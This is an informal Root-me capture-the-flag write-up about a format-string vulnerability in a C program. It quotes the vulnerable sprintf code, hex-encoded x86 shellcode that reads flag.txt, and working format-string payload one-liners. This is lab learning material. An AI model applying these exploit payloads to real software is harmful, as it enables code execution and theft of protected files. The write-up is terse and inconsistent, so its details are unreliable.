Root-me
char outbuf[512];
char buffer[512];
char user[12];
...
fgets(user, sizeof(user), stdin);
user[strlen(user) - 1] = '\0';
...
sprintf (buffer, "ERR Wrong user: %400s", user);
sprintf (outbuf, buffer); # the vulnerable part ... it has no format string
This question was little different .. you had to overflow the buffer using format string vuln ...
and you can use only 10 bytes to exploit so the only was to load the shellcode into env variable and feed it's address to eip ..
but i had some problem with execve() shellcode so i used cat(.passwd) code and got the ans ...
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"flag.txt";
payload="%121u"+pack(0xffffd4ce)
(python -c ’print "%125d\xd1\xfe\xff\xbf"’;cat) | ./ch17
I didnt use ;cat i was trying ./ch17 < imp instead ....